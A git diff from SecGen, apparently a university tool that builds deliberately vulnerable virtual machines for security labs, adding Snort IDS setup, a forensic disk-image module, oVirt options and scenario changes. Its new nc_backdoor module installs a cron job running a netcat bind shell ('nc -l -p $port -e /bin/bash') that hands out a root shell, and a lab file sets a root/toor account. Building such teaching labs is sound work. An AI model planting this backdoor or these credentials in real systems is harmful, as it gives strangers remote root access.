new file mode 100644
index 000000000..366a805e2
--- /dev/null
+++ b/modules/utilities/unix/compromised/dead_image/manifests/install.pp
@@ -0,0 +1,16 @@
+class dead_image::install {
+
+ # $url_path = "http://z.cliffe.schreuders.org/files/6543367533"
+ $url_path = "http://hacktivity.aet.leedsbeckett.ac.uk/files"
+ file { '/root/evidence/':
+ ensure => 'directory'
+ } ->
+ # This file is just too big and binary to make sense to include in the git repo
+ file { '/root/evidence/hda1.img':
+ source => "$url_path/hda1.img"
+ } ->
+ file { '/root/evidence/md5s':
+ source => "$url_path/md5s"
+ }
+
+}
diff --git a/modules/utilities/unix/compromised/dead_image/secgen_metadata.xml b/modules/utilities/unix/compromised/dead_image/secgen_metadata.xml
new file mode 100644
index 000000000..03c2e76c1
--- /dev/null
+++ b/modules/utilities/unix/compromised/dead_image/secgen_metadata.xml
@@ -0,0 +1,15 @@
+
+
+
+ Dead HDD image
+ Z. Cliffe Schreuders
+ MIT
+ A disk image taken from a compromised Redhat 7.2 system (from the Honeynet Project). This module drops the image in /root/evidence/
+
+
+ forensic_artifact
+ linux
+
+
diff --git a/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb b/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
index 9a56c4501..eff364ac9 100644
--- a/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
+++ b/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
@@ -209,7 +209,7 @@ def read_bots (irc_server_ip_address)
end
if quiz != nil
- correct_answer = quiz['answer']
+ correct_answer = quiz['answer'].clone
if bots[bot_name]['attacks'][current].key?('post_command_output')
correct_answer.gsub!(/{{post_command_output}}/, (bots[bot_name]['attacks'][current]['post_command_output']||''))
end
@@ -220,6 +220,7 @@ def read_bots (irc_server_ip_address)
correct_answer.gsub!(/{{pre_shell_command_output_first_line}}/, (bots[bot_name]['attacks'][current]['get_shell_command_output']||'').split("\n").first)
end
correct_answer.chomp!
+ Print.debug "#{correct_answer}====#{answer}"
if answer.match(/#{correct_answer}/i)
m.reply bots[bot_name]['messages']['correct_answer']
diff --git a/modules/utilities/unix/hackerbot/files/www/images/leedsbeckett-logo.png b/modules/utilities/unix/hackerbot/files/www/images/leedsbeckett-logo.png
index a379d9de8..49fabb696 100644
Binary files a/modules/utilities/unix/hackerbot/files/www/images/leedsbeckett-logo.png and b/modules/utilities/unix/hackerbot/files/www/images/leedsbeckett-logo.png differ
diff --git a/modules/utilities/unix/irc_clients/pidgin/manifests/config.pp b/modules/utilities/unix/irc_clients/pidgin/manifests/config.pp
index 23f281640..59ea2bcdf 100644
--- a/modules/utilities/unix/irc_clients/pidgin/manifests/config.pp
+++ b/modules/utilities/unix/irc_clients/pidgin/manifests/config.pp
@@ -9,9 +9,15 @@ class pidgin::config {
$accounts.each |$raw_account| {
$account = parsejson($raw_account)
$username = $account['username']
- $conf_dir = "/home/$username/.purple"
+ # set home directory
+ if $username == 'root' {
+ $home_dir = "/root"
+ } else {
+ $home_dir = "/home/$username"
+ }
+ $conf_dir = "$home_dir/.purple"
- file { ["/home/$username/",
+ file { ["$home_dir/",
"$conf_dir",
"$conf_dir/smileys/",
"$conf_dir/icons/",
@@ -57,13 +63,13 @@ class pidgin::config {
# autostart script
if $autostart {
- file { ["/home/$username/.config/", "/home/$username/.config/autostart/"]:
+ file { ["$home_dir/.config/", "$home_dir/.config/autostart/"]:
ensure => directory,
owner => $username,
group => $username,
}
- file { "/home/$username/.config/autostart/pidgin.desktop":
+ file { "$home_dir/.config/autostart/pidgin.desktop":
ensure => file,
source => 'puppet:///modules/pidgin/pidgin.desktop',
owner => $username,
diff --git a/modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb~upstream_stretch_kde_update b/modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb~upstream_stretch_kde_update
new file mode 100644
index 000000000..22d5d689f
--- /dev/null
+++ b/modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb~upstream_stretch_kde_update
@@ -0,0 +1,8 @@
+#This file is generated by ModuleSync, do not edit.
+require 'puppetlabs_spec_helper/module_spec_helper'
+
+# put local configuration and setup into spec_helper_local
+begin
+ require 'spec_helper_local'
+rescue LoadError
+end
diff --git a/modules/utilities/unix/monitoring_ids/snort/manifests/config.pp b/modules/utilities/unix/monitoring_ids/snort/manifests/config.pp
new file mode 100644
index 000000000..c40e8a68f
--- /dev/null
+++ b/modules/utilities/unix/monitoring_ids/snort/manifests/config.pp
@@ -0,0 +1,17 @@
+class snort::config{
+
+ file { '/etc/snort/snort.debian.conf':
+ ensure => present,
+ owner => 'root',
+ group => 'root',
+ mode => '0777',
+ content => template('snort/snort.debian.conf.erb')
+ }
+
+ # enable the alerts file output
+ file_line { 'Append a line to /etc/snort/snort.conf':
+ path => '/etc/snort/snort.conf',
+ line => 'output alert_fast',
+ }
+
+}
diff --git a/modules/utilities/unix/monitoring_ids/snort/manifests/install.pp b/modules/utilities/unix/monitoring_ids/snort/manifests/install.pp
index fcce33972..8711637bb 100644
--- a/modules/utilities/unix/monitoring_ids/snort/manifests/install.pp
+++ b/modules/utilities/unix/monitoring_ids/snort/manifests/install.pp
@@ -1,5 +1,15 @@
-class snort::install{
- package { ['snort']:
- ensure => 'installed',
+class snort::install {
+
+ # install rules and config via debian repo
+ package { ['snort-rules-default','snort-common']:
+ ensure => installed,
+ } ->
+
+ # force it to not be enabled because the interface in the config may be wrong
+ exec { 'install snort':
+ path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ],
+ command => '/bin/true',
+ provider => shell,
+ onlyif => 'apt-get install -y snort; systemctl disable snort',
}
}
diff --git a/modules/utilities/unix/monitoring_ids/snort/manifests/service.pp b/modules/utilities/unix/monitoring_ids/snort/manifests/service.pp
index ccb5b54eb..3a9094922 100644
--- a/modules/utilities/unix/monitoring_ids/snort/manifests/service.pp
+++ b/modules/utilities/unix/monitoring_ids/snort/manifests/service.pp
@@ -1,5 +1,2 @@
class snort::service{
- service { 'snort':
- ensure => running
- }
-}
\ No newline at end of file
+}
diff --git a/modules/utilities/unix/monitoring_ids/snort/secgen_metadata.xml b/modules/utilities/unix/monitoring_ids/snort/secgen_metadata.xml
index 71f149cb9..967d52c51 100644
--- a/modules/utilities/unix/monitoring_ids/snort/secgen_metadata.xml
+++ b/modules/utilities/unix/monitoring_ids/snort/secgen_metadata.xml
@@ -12,8 +12,9 @@
linux
-
- .*Stretch.*
-
+
+
+ update
+
diff --git a/modules/utilities/unix/monitoring_ids/snort/snort.pp b/modules/utilities/unix/monitoring_ids/snort/snort.pp
index 09b26fc86..2c2b7b6f2 100644
--- a/modules/utilities/unix/monitoring_ids/snort/snort.pp
+++ b/modules/utilities/unix/monitoring_ids/snort/snort.pp
@@ -1,2 +1,3 @@
include snort::install
+include snort::config
include snort::service
diff --git a/modules/utilities/unix/monitoring_ids/snort/templates/snort.debian.conf.erb b/modules/utilities/unix/monitoring_ids/snort/templates/snort.debian.conf.erb
new file mode 100644
index 000000000..5ec272531
--- /dev/null
+++ b/modules/utilities/unix/monitoring_ids/snort/templates/snort.debian.conf.erb
@@ -0,0 +1,25 @@
+# snort.debian.config (Debian Snort configuration file)
+#
+# This file was generated by the post-installation script of the snort
+# package using values from the debconf database.
+#
+# It is used for options that are changed by Debian to leave
+# the original configuration files untouched.
+#
+# This file is automatically updated on upgrades of the snort package
+# *only* if it has not been modified since the last upgrade of that package.
+#
+# If you have edited this file but would like it to be automatically updated
+# again, run the following command as root:
+# dpkg-reconfigure snort
+
+DEBIAN_SNORT_STARTUP="boot"
+DEBIAN_SNORT_HOME_NET="any"
+DEBIAN_SNORT_OPTIONS=""
+
+# oVirt uses ens3, change this if it's not the name of your interface
+DEBIAN_SNORT_INTERFACE="ens3"
+
+DEBIAN_SNORT_SEND_STATS="true"
+DEBIAN_SNORT_STATS_RCPT="root"
+DEBIAN_SNORT_STATS_THRESHOLD="1"
diff --git a/modules/utilities/unix/web_browsers/iceweasel/manifests/config.pp b/modules/utilities/unix/web_browsers/iceweasel/manifests/config.pp
index e1c261119..bf8af4ea5 100644
--- a/modules/utilities/unix/web_browsers/iceweasel/manifests/config.pp
+++ b/modules/utilities/unix/web_browsers/iceweasel/manifests/config.pp
@@ -9,16 +9,22 @@ class iceweasel::config {
$accounts.each |$raw_account| {
$account = parsejson($raw_account)
$username = $account['username']
+ # set home directory
+ if $username == 'root' {
+ $home_dir = "/root"
+ } else {
+ $home_dir = "/home/$username"
+ }
# add user profile
- file { ["/home/$username/", "/home/$username/.mozilla/",
- "/home/$username/.mozilla/firefox",
- "/home/$username/.mozilla/firefox/user.default"]:
+ file { ["$home_dir/", "$home_dir/.mozilla/",
+ "$home_dir/.mozilla/firefox",
+ "$home_dir/.mozilla/firefox/user.default"]:
ensure => directory,
owner => $username,
group => $username,
}->
- file { "/home/$username/.mozilla/firefox/profiles.ini":
+ file { "$home_dir/.mozilla/firefox/profiles.ini":
ensure => file,
source => 'puppet:///modules/iceweasel/profiles.ini',
owner => $username,
@@ -26,7 +32,7 @@ class iceweasel::config {
}->
# set start page via template:
- file { "/home/$username/.mozilla/firefox/user.default/user.js":
+ file { "$home_dir/.mozilla/firefox/user.default/user.js":
ensure => file,
content => template('iceweasel/user.js.erb'),
owner => $username,
@@ -35,14 +41,14 @@ class iceweasel::config {
# autostart script
if $autostart {
- file { ["/home/$username/.config/", "/home/$username/.config/autostart/"]:
+ file { ["$home_dir/.config/", "$home_dir/.config/autostart/"]:
ensure => directory,
owner => $username,
group => $username,
- require => File["/home/$username/"],
+ require => File["$home_dir/"],
}
- file { "/home/$username/.config/autostart/iceweasel.desktop":
+ file { "$home_dir/.config/autostart/iceweasel.desktop":
ensure => file,
source => 'puppet:///modules/iceweasel/iceweasel.desktop',
owner => $username,
diff --git a/modules/vulnerabilities/unix/misc/distcc_exec/secgen_metadata.xml b/modules/vulnerabilities/unix/misc/distcc_exec/secgen_metadata.xml
index 95b6b8ecd..30b78f65a 100644
--- a/modules/vulnerabilities/unix/misc/distcc_exec/secgen_metadata.xml
+++ b/modules/vulnerabilities/unix/misc/distcc_exec/secgen_metadata.xml
@@ -45,4 +45,8 @@
distcc
-
\ No newline at end of file
+
+ update
+
+
+
diff --git a/modules/vulnerabilities/unix/misc/nc_backdoor/manifests/install.pp b/modules/vulnerabilities/unix/misc/nc_backdoor/manifests/install.pp
new file mode 100644
index 000000000..39c3952b5
--- /dev/null
+++ b/modules/vulnerabilities/unix/misc/nc_backdoor/manifests/install.pp
@@ -0,0 +1,28 @@
+class nc_backdoor::install {
+ # package { 'nc':
+ # ensure => installed
+ # }
+
+ $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
+ $port = $secgen_parameters['port'][0]
+
+ $strings_to_leak = $secgen_parameters['strings_to_leak']
+ $leaked_filenames = $secgen_parameters['leaked_filenames']
+
+
+ # run on each boot via cron
+ cron { 'backdoor':
+ command => "nc -l -p $port -e /bin/bash",
+ special => 'reboot',
+ }
+
+ ::secgen_functions::leak_files { "root-file-leak":
+ storage_directory => "/root/",
+ leaked_filenames => $leaked_filenames,
+ strings_to_leak => $strings_to_leak,
+ owner => root,
+ group => root,
+ mode => '0600',
+ leaked_from => "accounts_root",
+ }
+}
diff --git a/modules/vulnerabilities/unix/misc/nc_backdoor/nc_backdoor.pp b/modules/vulnerabilities/unix/misc/nc_backdoor/nc_backdoor.pp
new file mode 100644
index 000000000..34e9b682b
--- /dev/null
+++ b/modules/vulnerabilities/unix/misc/nc_backdoor/nc_backdoor.pp
@@ -0,0 +1 @@
+include nc_backdoor::install
diff --git a/modules/vulnerabilities/unix/misc/nc_backdoor/secgen_metadata.xml b/modules/vulnerabilities/unix/misc/nc_backdoor/secgen_metadata.xml
new file mode 100644
index 000000000..5d8b09d9d
--- /dev/null
+++ b/modules/vulnerabilities/unix/misc/nc_backdoor/secgen_metadata.xml
@@ -0,0 +1,49 @@
+
+
+
+ Netcat Backdoor
+ Z. Cliffe Schreuders
+ MIT
+ A netcat backdoor (acts as a bind shell -- listens on a port and serves a shell).
+
+ simple_backdoor
+ bind_shell
+ root_rwx
+ remote
+ unix
+
+ port
+ strings_to_leak
+ leaked_filenames
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ low
+ 10
+ AV:N/AC:L/Au:N/C:C/I:C/A:C
+ nc
+
+
+ Connect to a port
+ Simply connecting to the right port will give you a root shell.
+
+
+ update
+
+
+
diff --git a/modules/vulnerabilities/unix/system/ssh_root_login/secgen_metadata.xml b/modules/vulnerabilities/unix/system/ssh_root_login/secgen_metadata.xml
index 39112f414..d53e25dbb 100644
--- a/modules/vulnerabilities/unix/system/ssh_root_login/secgen_metadata.xml
+++ b/modules/vulnerabilities/unix/system/ssh_root_login/secgen_metadata.xml
@@ -38,4 +38,7 @@
-
\ No newline at end of file
+
+ update
+
+
diff --git a/scenarios/examples/services_utilities_examples/snort.xml b/scenarios/examples/services_utilities_examples/snort.xml
new file mode 100644
index 000000000..d9b8bc320
--- /dev/null
+++ b/scenarios/examples/services_utilities_examples/snort.xml
@@ -0,0 +1,59 @@
+
+
+
+
+
+ ids_snoop
+
+
+
+ 172.16.0.2
+
+
+
+
+
+
+
+ mythical_creatures
+
+
+
+
+ tiaspbiqe2r
+
+
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+ accounts
+
+
+
+
+
+
+
+
+ IP_addresses
+
+
+
+
+
+
+
+
diff --git a/scenarios/labs/3_backups_and_recovery.xml b/scenarios/labs/3_backups_and_recovery.xml
index 9a055310e..7c4600dcf 100644
--- a/scenarios/labs/3_backups_and_recovery.xml
+++ b/scenarios/labs/3_backups_and_recovery.xml
@@ -6,7 +6,7 @@
Backups labZ. Cliffe Schreuders
- A Hackerbot lab. Work through the labsheet, then when prompted interact with Hackerbot.
+ A Hackerbot lab. Work through the labsheet, then when prompted interact with Hackerbot. Topics covered: Rsync, and backups and restoring data using differential and incremental backups.ctf-labhackerbot-lab
@@ -171,8 +171,8 @@
- server
-
+ backup_server
+
@@ -187,7 +187,7 @@
-
+
@@ -197,7 +197,7 @@
- hb_server
+ hackerbot_server
diff --git a/scenarios/labs/4_ids.xml b/scenarios/labs/4_ids.xml
index 140683916..77b4de8f8 100644
--- a/scenarios/labs/4_ids.xml
+++ b/scenarios/labs/4_ids.xml
@@ -155,7 +155,7 @@
- ids_server
+ ids_snoop
@@ -195,7 +195,7 @@
web_server
-
+
@@ -209,7 +209,7 @@
-
+
+
@@ -209,7 +210,7 @@
-
+
diff --git a/scenarios/labs/8_exfiltration_detection.xml b/scenarios/labs/6_exfiltration_detection.xml
similarity index 97%
rename from scenarios/labs/8_exfiltration_detection.xml
rename to scenarios/labs/6_exfiltration_detection.xml
index e5691410e..464912594 100644
--- a/scenarios/labs/8_exfiltration_detection.xml
+++ b/scenarios/labs/6_exfiltration_detection.xml
@@ -182,7 +182,7 @@
- ids_server
+ ids_snoop
@@ -222,7 +222,7 @@
web_server
-
+
@@ -232,8 +232,7 @@
-
-
+
diff --git a/scenarios/labs/6_live_analysis.xml b/scenarios/labs/7_live_analysis.xml
similarity index 56%
rename from scenarios/labs/6_live_analysis.xml
rename to scenarios/labs/7_live_analysis.xml
index a011f3f44..adaa3ac37 100644
--- a/scenarios/labs/6_live_analysis.xml
+++ b/scenarios/labs/7_live_analysis.xml
@@ -17,21 +17,28 @@
desktop
-
-
- 172.16.0.2
- 172.16.0.3
+
+
+
+ mythical_creatures
+
+
-
+
+
+ 172.16.0.2
+
+ 172.16.0.3
+
+ 172.16.0.4
+
+
+
-
-
- mythical_creatures
-
-
+ main_usernametiaspbiqe2r
@@ -39,54 +46,6 @@
true
-
-
-
-
-
-
-
-
-
-
-
- mythical_creatures
-
-
-
-
- test
-
-
- false
-
-
-
-
-
-
-
-
-
-
-
-
- mythical_creatures
-
-
-
-
- test
-
-
- false
-
-
-
-
-
-
-
@@ -113,6 +72,7 @@
+
@@ -149,6 +109,98 @@
+
+ compromised_server
+
+
+
+
+
+
+
+
+
+ main_username
+
+
+ tiaspbiqe2r
+
+
+ true
+
+
+ u_r_powned-hme
+ .a_hidden_flag-hme
+ hidden_string
+
+
+
+
+ powned_messages
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ nc_port
+
+
+ nc
+ hme
+ hidden_string
+
+
+
+
+
+
+
+
+
+
+ accounts_compromised
+
+
+
+
+
+
+
+
+
+
+
+
+
+ hackerbot_access_root_password
+
+
+
+
+
+ IP_addresses
+
+
+
+
+
hackerbot_server
@@ -163,7 +215,7 @@
-
+ accounts
@@ -174,6 +226,15 @@
IP_addresses
+
+ IP_addresses
+
+
+ nc_port
+
+
+ hidden_string
+
@@ -190,4 +251,5 @@
+
diff --git a/scenarios/labs/7_dead_analysis.xml b/scenarios/labs/8_dead_analysis.xml
similarity index 87%
rename from scenarios/labs/7_dead_analysis.xml
rename to scenarios/labs/8_dead_analysis.xml
index 3dcc73abf..c745c6f2c 100644
--- a/scenarios/labs/7_dead_analysis.xml
+++ b/scenarios/labs/8_dead_analysis.xml
@@ -17,7 +17,6 @@
desktop
-
172.16.0.2172.16.0.3
@@ -164,7 +163,7 @@
-
+ accounts
@@ -195,10 +194,37 @@
kali
+
+ {"username":"root","password":"toor","super_user":"","strings_to_leak":[],"leaked_filenames":[]}
+
+
+
+
+
+
+
+ kali_root_account
+
+
+ true
+
+
+ IP_addresses
+
+
+
+
+
+ IP_addresses
+
+
+ kali_root_account
+
+
diff --git a/scenarios/labs/hacker_vs_hackerbot_1.xml b/scenarios/labs/hacker_vs_hackerbot_1.xml
index 2383990d8..e23dc3cf1 100644
--- a/scenarios/labs/hacker_vs_hackerbot_1.xml
+++ b/scenarios/labs/hacker_vs_hackerbot_1.xml
@@ -4,7 +4,7 @@
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/scenario">
- Hacker vs hacker 1
+ Hacker vs Hackerbot 1Z. Cliffe SchreudersA Hackerbot test.
@@ -14,7 +14,7 @@
desktop
-
+ 172.16.0.2
@@ -37,7 +37,7 @@
-
+ tiaspbiqe2rtrue
@@ -79,7 +79,7 @@
-
+ tiaspbiqe2rfalse
@@ -126,6 +126,9 @@
+
+ accounts
+
accounts
@@ -175,7 +178,8 @@
backup_server
-
+
+
diff --git a/scenarios/labs/hacker_vs_hackerbot_2.xml b/scenarios/labs/hacker_vs_hackerbot_2.xml
index a30994075..cddedb309 100644
--- a/scenarios/labs/hacker_vs_hackerbot_2.xml
+++ b/scenarios/labs/hacker_vs_hackerbot_2.xml
@@ -4,7 +4,7 @@
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/scenario">
- Hacker vs hacker 2
+ Hacker vs Hackerbot 2Z. Cliffe SchreudersA Hackerbot test.
@@ -14,13 +14,14 @@
desktop
-
+ 172.16.0.2172.16.0.3172.16.0.4172.16.0.5
+ 172.16.0.6
@@ -30,7 +31,7 @@
-
+
mythical_creatures
@@ -38,7 +39,7 @@
-
+ tiaspbiqe2rtrue
@@ -136,6 +137,9 @@
+
+ accounts
+
accounts
@@ -183,8 +187,8 @@
- ids_server
-
+ ids_snoop
+
@@ -247,7 +251,7 @@
web_server
-
+
@@ -308,6 +312,9 @@
IP_addresses
+
+ IP_addresses
+
IP_addresses
@@ -328,4 +335,69 @@
+
+
+ compromised_server
+
+
+
+
+
+
+
+
+
+ main_username
+
+
+ tiaspbiqe2r
+
+
+ true
+
+
+ u_r_powned-hme
+ .hidden_flag-hme
+ hidden_string
+
+
+
+
+ powned_messages
+
+
+
+
+
+
+
+
+
+
+
+ nc
+ hme
+ hidden_string
+
+
+
+
+
+ accounts_compromised
+
+
+
+
+
+ hackerbot_access_root_password
+
+
+
+
+
+ IP_addresses
+
+
+
+
diff --git a/scenarios/security_audit/team_project.xml b/scenarios/security_audit/team_project.xml
index 2061cd0c1..77aef4071 100644
--- a/scenarios/security_audit/team_project.xml
+++ b/scenarios/security_audit/team_project.xml
@@ -17,13 +17,14 @@
web_server
-
+ 172.10.0.1172.10.0.2172.10.0.3172.10.0.4
+ 172.10.0.5
@@ -78,7 +79,7 @@
intranet_server
-
+
@@ -174,7 +175,8 @@
desktop
-
+
+
@@ -198,7 +200,17 @@
- attack_vm
+ attack_vm_1
+
+
+
+ IP_addresses
+
+
+
+
+
+ attack_vm_2
diff --git a/scenarios/test_scenario.xml b/scenarios/test_scenario.xml
index 25e29f3b1..9316d6e6e 100644
--- a/scenarios/test_scenario.xml
+++ b/scenarios/test_scenario.xml
@@ -6,16 +6,14 @@
- gitlist
-
+ test_stanif_clone
+ 172.16.0.2172.16.0.3
-
-
IP_addresses
@@ -24,14 +22,4 @@
-
- desktop
-
-
-
- IP_addresses
-
-
-
-
diff --git a/secgen.rb b/secgen.rb
index f6141d45e..f52637e72 100644
--- a/secgen.rb
+++ b/secgen.rb
@@ -46,12 +46,15 @@ def usage
--ovirtauthz [ovirt authz]
--ovirt-cluster [ovirt_cluster]
--ovirt-network [ovirt_network_name]
+ --ovirt-affinity-group [ovirt_affinity_group_name]
COMMANDS:
run, r: Builds project and then builds the VMs
build-project, p: Builds project (vagrant and puppet config), but does not build VMs
build-vms, v: Builds VMs from a previously generated project
(use in combination with --project [dir])
+ ovirt-post-build: only performs the ovirt actions that normally follow a successful vm build
+ (snapshots and networking)
create-forensic-image: Builds forensic images from a previously generated project
(can be used in combination with --project [dir])
list-scenarios: Lists all scenarios that can be used with the --scenario option
@@ -80,7 +83,7 @@ def build_config(scenario, out_dir, options)
}
Print.info "Creating project: #{out_dir}..."
- # create's vagrant file / report a starts the vagrant installation'
+ # creates Vagrantfile and other outputs and starts the vagrant installation
creator = ProjectFilesCreator.new(systems, out_dir, scenario, options)
creator.write_files
@@ -89,14 +92,14 @@ end
# Builds the vm via the vagrant file in the project dir
# @param project_dir
-def build_vms(project_dir, options)
+def build_vms(scenario, project_dir, options)
unless project_dir.include? ROOT_DIR
Print.info 'Relative path to project detected'
project_dir = "#{ROOT_DIR}/#{project_dir}"
Print.info "Using #{project_dir}"
end
- scenario = project_dir + '/scenario.xml'
+ project_dir + '/scenario.xml'
Print.info "Building project: #{project_dir}"
system = ''
@@ -109,7 +112,7 @@ def build_vms(project_dir, options)
end
# if deploying to ovirt, when things fail to build, set the retry_count
- retry_count = OVirtFunctions::provider_ovirt?(options) ? 10 : 0
+ retry_count = OVirtFunctions::provider_ovirt?(options) ? 2 : 0
successful_creation = false
while retry_count and !successful_creation
@@ -167,18 +170,39 @@ def build_vms(project_dir, options)
end
else # TODO: elsif vagrant_output[:exception].type == ProcessHelper::TimeoutError >destroy individually broken vms as above?
Print.err 'Vagrant up timeout, destroying VMs and retrying...'
- GemExec.exe('vagrant', project_dir, 'destroy -f')
+ # GemExec.exe('vagrant', project_dir, 'destroy -f')
end
else
Print.err 'Error provisioning VMs, destroying VMs and exiting SecGen.'
- GemExec.exe('vagrant', project_dir, 'destroy -f')
+ # GemExec.exe('vagrant', project_dir, 'destroy -f')
exit 1
end
end
retry_count -= 1
end
- if successful_creation && options[:snapshot]
+ if successful_creation
+ ovirt_post_build(options, scenario, project_dir)
+ else
+ Print.err "Failed to build VMs"
+ exit 1
+ end
+end
+
+# actions on the VMs after vagrant has built them
+# this includes networking and snapshots
+def ovirt_post_build(options, scenario, project_dir)
+ Print.std 'Taking oVirt post-build actions...'
+ if options[:ovirtnetwork]
+ Print.info 'Assigning network(s) of VM(s)'
+ OVirtFunctions::assign_networks(options, scenario, get_vm_names(scenario))
+ end
+ if options[:ovirtaffinitygroup]
+ Print.info 'Assigning affinity group of VM(s)'
+ OVirtFunctions::assign_affinity_group(options, scenario, get_vm_names(scenario))
+ end
+ if options[:snapshot]
Print.info 'Creating a snapshot of VM(s)'
+ sleep(20) # give oVirt/Virtualbox a chance to save any VM config changes before creating the snapshot
if OVirtFunctions::provider_ovirt?(options)
OVirtFunctions::create_snapshot(options, scenario, get_vm_names(scenario))
else
@@ -249,7 +273,7 @@ end
# Runs methods to run and configure a new vm from the configuration file
def run(scenario, project_dir, options)
build_config(scenario, project_dir, options)
- build_vms(project_dir, options)
+ build_vms(scenario, project_dir, options)
end
def default_project_dir
@@ -283,17 +307,25 @@ def delete_all_projects
FileUtils.rm_r(Dir.glob("#{PROJECTS_DIR}/*"))
end
+# returns an array containing the system names from the scenario
def get_vm_names(scenario)
vm_names = []
parser = Nori.new
- scenario_hash = parser.parse(File.read(scenario))['scenario']
+ scenario_hash = parser.parse(File.read(scenario))
+ Print.debug "scenario_hash: #{scenario_hash}"
+ if scenario_hash.key?('scenario') # work around for a parsing quirk
+ scenario_hash = scenario_hash['scenario']
+ end
if scenario_hash['system'].is_a? Array
scenario_hash['system'].each do |system|
vm_names << system['system_name']
end
- else
+ elsif scenario_hash['system'].is_a? Hash
vm_names << scenario_hash['system']['system_name']
+ else
+ Print.debug "Not an array or hash?: #{scenario_hash['system']}"
end
+ Print.debug vm_names.to_s
vm_names
end
@@ -343,6 +375,7 @@ opts = GetoptLong.new(
['--ovirtauthz', GetoptLong::REQUIRED_ARGUMENT],
['--ovirt-cluster', GetoptLong::REQUIRED_ARGUMENT],
['--ovirt-network', GetoptLong::REQUIRED_ARGUMENT],
+ ['--ovirt-affinity-group', GetoptLong::REQUIRED_ARGUMENT],
['--snapshot', GetoptLong::NO_ARGUMENT],
)
@@ -431,6 +464,9 @@ opts.each do |opt, arg|
when '--ovirt-network'
Print.info "Ovirt Network Name : #{arg}"
options[:ovirtnetwork] = arg
+ when '--ovirt-affinity-group'
+ Print.info "Ovirt Affinity Group : #{arg}"
+ options[:ovirtaffinitygroup] = arg
when '--snapshot'
Print.info "Taking snapshots when VMs are created"
options[:snapshot] = true
@@ -438,7 +474,7 @@ opts.each do |opt, arg|
else
Print.err "Argument not valid: #{arg}"
usage
- exit
+ exit 1
end
end
@@ -446,7 +482,7 @@ end
if ARGV.length < 1
Print.err 'Missing command'
usage
- exit
+ exit 1
end
# process command
@@ -459,26 +495,30 @@ case ARGV[0]
build_config(scenario, project_dir, options)
when 'build-vms', 'v'
if project_dir
- build_vms(project_dir, options)
+ build_vms(scenario, project_dir, options)
else
Print.err 'Please specify project directory to read'
usage
- exit
+ exit 1
end
when 'create-forensic-image'
image_type = options.has_key?(:forensic_image_type) ? options[:forensic_image_type] : 'raw';
if project_dir
- build_vms(project_dir, options)
+ build_vms(scenario, project_dir, options)
make_forensic_image(project_dir, nil, image_type)
else
project_dir = default_project_dir unless project_dir
build_config(scenario, project_dir, options)
- build_vms(project_dir, options)
+ build_vms(scenario, project_dir, options)
make_forensic_image(project_dir, nil, image_type)
end
+ when 'ovirt-post-build'
+ ovirt_post_build(options, scenario, project_dir)
+ exit 0
+
when 'list-scenarios'
list_scenarios
exit 0
@@ -495,5 +535,5 @@ case ARGV[0]
else
Print.err "Command not valid: #{ARGV[0]}"
usage
- exit
+ exit 1
end